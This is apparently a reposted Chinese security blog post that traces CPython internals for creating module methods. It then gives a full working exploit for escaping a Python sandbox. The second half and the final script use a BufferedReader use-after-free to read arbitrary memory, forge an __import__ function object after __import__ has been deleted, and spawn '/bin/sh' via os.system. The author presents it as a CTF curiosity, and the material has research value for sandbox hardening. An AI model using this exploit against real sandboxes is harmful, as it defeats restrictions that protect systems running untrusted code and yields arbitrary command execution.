
//Modules\_io\clinic\_iomodule.c.h
#define _IO_OPEN_METHODDEF    \
    {"open", (PyCFunction)(void(*)(void))_io_open, METH_FASTCALL|METH_KEYWORDS, _io_open__doc__},

//Modules\_io\_iomodule.c
static PyMethodDef module_methods[] = {
    _IO_OPEN_METHODDEF
    _IO_TEXT_ENCODING_METHODDEF
    _IO_OPEN_CODE_METHODDEF
    {NULL, NULL}
};

struct PyModuleDef _PyIO_Module = {
    PyModuleDef_HEAD_INIT,
    "io",
    module_doc,
    sizeof(_PyIO_State),
    module_methods,
    NULL,
    iomodule_traverse,
    iomodule_clear,
    (freefunc)iomodule_free,
};

现在来看下具体的PyModule_Create2函数：

在_PyModule_CreateInitialized函数中根据模块名称，使用PyModule_New创建了一个模块对象m；
调用PyModule_AddFunctions为m添加方法，module->m_methods则是方法描述数组，其中就有open方法描述_IO_OPEN_METHODDEF；
在函数_add_methods_to_object中会遍历模块包含的方法描述符数组，为每个PyMethodDef对象，调用PyCFunction_NewEx来创建一个PyCFunctionObject对象，传入的第2个参数module就是_io模块对象了，第3个参数是表示_io模块的名称。

//Objects\moduleobject.c
PyObject *
PyModule_Create2(struct PyModuleDef* module, int module_api_version)
{
    if (!_PyImport_IsInitialized(_PyInterpreterState_GET())) {
        PyErr_SetString(PyExc_SystemError,
                        "Python import machinery not initialized");
        return NULL;
    }
    return _PyModule_CreateInitialized(module, module_api_version);
}

PyObject *
_PyModule_CreateInitialized(struct PyModuleDef* module, int module_api_version)
{
    const char* name;
    PyModuleObject *m;
    .....
    name = module->m_name;
    ......
    if ((m = (PyModuleObject*)PyModule_New(name)) == NULL)
        return NULL;
    ......
    if (module->m_methods != NULL) {
        if (PyModule_AddFunctions((PyObject *) m, module->m_methods) != 0) {
            Py_DECREF(m);
            return NULL;
        }
    }
    ......
}

int
PyModule_AddFunctions(PyObject *m, PyMethodDef *functions)
{
    int res;
    PyObject *name = PyModule_GetNameObject(m);
    if (name == NULL) {
        return -1;
    }

    res = _add_methods_to_object(m, name, functions);
    Py_DECREF(name);
    return res;
}

static int
_add_methods_to_object(PyObject *module, PyObject *name, PyMethodDef *functions)
{
    PyObject *func;
    PyMethodDef *fdef;

    for (fdef = functions; fdef->ml_name != NULL; fdef++) {
        if ((fdef->ml_flags & METH_CLASS) ||
            (fdef->ml_flags & METH_STATIC)) {
            PyErr_SetString(PyExc_ValueError,
                            "module functions cannot set"
                            " METH_CLASS or METH_STATIC");
            return -1;
        }
        func = PyCFunction_NewEx(fdef, (PyObject*)module, name);
        if (func == NULL) {
            return -1;
        }
        if (PyObject_SetAttrString(module, fdef->ml_name, func) != 0) {
            Py_DECREF(func);
            return -1;
        }
        Py_DECREF(func);
    }

    return 0;
}

再看下PyCFunction_NewEx，第二个参数就是SELF，赋值给了m_self，所以也就解答了open.__self__是_io模块对象的原因了。

//Include\methodobject.h
#define PyCFunction_NewEx(ML, SELF, MOD) PyCMethod_New((ML), (SELF), (MOD), NULL)

//Objects\methodobject.c
PyObject *
PyCMethod_New(PyMethodDef *ml, PyObject *self, PyObject *module, PyTypeObject *cls)
{
    /* Figure out correct vectorcall function to use */
    vectorcallfunc vectorcall;
    switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS |
                            METH_O | METH_KEYWORDS | METH_METHOD))
    {
        case METH_VARARGS:
        case METH_VARARGS | METH_KEYWORDS:
            /* For METH_VARARGS functions, it's more efficient to use tp_call
             * instead of vectorcall. */
            vectorcall = NULL;
            break;
        case METH_FASTCALL:
            vectorcall = cfunction_vectorcall_FASTCALL;
            break;
        case METH_FASTCALL | METH_KEYWORDS:
            vectorcall = cfunction_vectorcall_FASTCALL_KEYWORDS;
            break;
        case METH_NOARGS:
            vectorcall = cfunction_vectorcall_NOARGS;
            break;
        case METH_O:
            vectorcall = cfunction_vectorcall_O;
            break;
        case METH_METHOD | METH_FASTCALL | METH_KEYWORDS:
            vectorcall = cfunction_vectorcall_FASTCALL_KEYWORDS_METHOD;
            break;
        default:
            PyErr_Format(PyExc_SystemError,
                         "%s() method: bad call flags", ml->ml_name);
            return NULL;
    }

    PyCFunctionObject *op = NULL;

    if (ml->ml_flags & METH_METHOD) {
        if (!cls) {
            PyErr_SetString(PyExc_SystemError,
                            "attempting to create PyCMethod with a METH_METHOD "
                            "flag but no class");
            return NULL;
        }
        PyCMethodObject *om = PyObject_GC_New(PyCMethodObject, &PyCMethod_Type);
        if (om == NULL) {
            return NULL;
        }
        Py_INCREF(cls);
        om->mm_class = cls;
        op = (PyCFunctionObject *)om;
    } else {
        if (cls) {
            PyErr_SetString(PyExc_SystemError,
                            "attempting to create PyCFunction with class "
                            "but no METH_METHOD flag");
            return NULL;
        }
        op = PyObject_GC_New(PyCFunctionObject, &PyCFunction_Type);
        if (op == NULL) {
            return NULL;
        }
    }

    op->m_weakreflist = NULL;
    op->m_ml = ml;
    Py_XINCREF(self);
    op->m_self = self;
    Py_XINCREF(module);
    op->m_module = module;
    op->vectorcall = vectorcall;
    _PyObject_GC_TRACK(op);
    return (PyObject *)op;
}

在学习彩蛋的过程中想到，python中自带的__builtins__也是一个PyModuleObject，而__import__则是__builtins__模块的方法，因此通过__builtins__模块的PyModuleObject->md_def->m_methods去找到__import__的方法描述，再伪造一个__import__的PyCFunctionObject结构体数据，最后利用memoryview指向该伪造数据，通过list对象即可使用__import__方法了。

5.1 寻找import的方法描述

按照PyModuleObject->md_def->m_methods，可以遍历PyMethodDef，读取PyMethodDef->ml_name，来判断是不是import。（PS:p是原exp中的Exploit对象）

def find_import_def(p):
    data = p.leak(id(__builtins__),0x40)
    md_def = data[0x18:0x20]
    md_def_addr = u64(md_def)

    data = p.leak(md_def_addr,0x48)
    m_methods = data[0x40:0x48]
    m_methods_addr = u64(m_methods)
    PyMethodDef_size = 0x20
    i = 0
    import_PyMethodDef_addr = b""
    while True:
        pyMethodDef = p.leak(m_methods_addr+i*PyMethodDef_size,0x20)
        ml_name = pyMethodDef[0:8]
        ml_name_addr = u64(ml_name)
        if ml_name_addr != 0:
            name = p.leak(ml_name_addr,10)
            if name == b'__import__':
                import_PyMethodDef_addr = m_methods_addr+i*PyMethodDef_size
                return import_PyMethodDef_addr
        else:
            break
        i = i+1
    return import_PyMethodDef_addr

5.2 伪造import方法对象

ob_type可以通过内置方法的类型来获取，id、dir、open、len都可以，m_ml则是找到的import的方法描述地址，m_self根据彩蛋知道就是__builtins__模块对象，其他属性赋值为0可以使用。

def fake_import(cmd):
    p = Exploit()
    import_PyMethodDef_addr = find_import_def(p)
    byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(type(len))), # type obj other func like id、dir、open、len
            p64(import_PyMethodDef_addr),          # PyMethodDef *m_ml             0x10
            p64(id(__builtins__)),          # PyObject    *m_self           0x18
            p64(0x0),          # PyObject    *m_module         0x20
            p64(0x0),          # PyObject    *m_weakreflist    0x28
            p64(0x0),           # vectorcallfunc vectorcall     0x30
        )
    p.freed_buffer[0] = id(byte_array_obj)+32
    os = p.fake_objs[0]("os")
    os.system(cmd)

5.3 总结

漏洞可能只能在CTF中Python沙箱了，利用该漏洞可以执行命令，但是条件是open方法没有被删除，但open一般会被作为危险方法删除，所以这漏洞实在是不知道有多好的利用方式，所以就权当好玩把。

附上最终的exp

io = open.__self__
def uN(b):
    out = 0
    for i in range(len(b)):
        out |= (b[i] & 0xff) << i*8
    return out

def u64(x):
    assert len(x) == 8
    return uN(x)

def u32(x):
    assert len(x) == 4
    return uN(x)

def u16(x):
    assert len(x) == 2
    return uN(x)


def p64(x):
    s = bytearray()
    while x > 0:
        s.append(x & 0xff)
        x >>= 8
    return s.ljust(8, b'\0')

def flat(*args):
    return b''.join(args)

class File(io._RawIOBase):
    def readinto(self, buf):
        global view
        view = buf
    def readable(self):
        return True


class Exploit:
    def _create_fake_byte_array(self, addr, size):
        byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(bytearray)), # type obj
            p64(size),          # ob_size
            p64(size),          # ob_alloc
            p64(addr),          # ob_bytes
            p64(addr),          # ob_start
            p64(0x0),           # ob_exports
        )
        self.no_gc.append(byte_array_obj)  # stop gc from freeing after return
        self.freed_buffer[0] = id(byte_array_obj) + 32

    def leak(self, addr, length):
        self._create_fake_byte_array(addr, length)
        return self.fake_objs[0][0:length]


    def __init__(self):
        # Trigger bug
        global view
        f = io.BufferedReader(File())
        f.read(1)
        del f
        view = view.cast('P')

        self.fake_objs = [None] * len(view)
        self.freed_buffer = view
        self.no_gc = []

def print_hex(data):
    print(hex(data))

def find_import_def(p):
    data = p.leak(id(__builtins__),0x40)
    md_def = data[0x18:0x20]
    md_def_addr = u64(md_def)

    data = p.leak(md_def_addr,0x48)
    m_methods = data[0x40:0x48]
    m_methods_addr = u64(m_methods)
    PyMethodDef_size = 0x20
    i = 0
    import_PyMethodDef_addr = b""
    while True:
        pyMethodDef = p.leak(m_methods_addr+i*PyMethodDef_size,0x20)
        ml_name = pyMethodDef[0:8]
        ml_name_addr = u64(ml_name)
        if ml_name_addr != 0:
            name = p.leak(ml_name_addr,10)
            if name == b'__import__':
                import_PyMethodDef_addr = m_methods_addr+i*PyMethodDef_size
                return import_PyMethodDef_addr
        else:
            break
        i = i+1
    return import_PyMethodDef_addr

def fake_import(cmd):
    p = Exploit()
    import_PyMethodDef_addr = find_import_def(p)
    byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(type(len))), # type obj other func like id、dir、len
            p64(import_PyMethodDef_addr),          # PyMethodDef *m_ml             0x10
            p64(id(__builtins__)),          # PyObject    *m_self           0x18
            p64(0x0),          # PyObject    *m_module         0x20
            p64(0x0),          # PyObject    *m_weakreflist    0x28
            p64(0x0),           # vectorcallfunc vectorcall     0x30
        )
    p.freed_buffer[0] = id(byte_array_obj)+32
    os = p.fake_objs[0]("os")
    os.system(cmd)

del __builtins__.__dict__['__import__']   
fake_import("/bin/sh")

文章来源: https://xz.aliyun.com/t/11399
如有侵权请联系:admin#unsafe.sh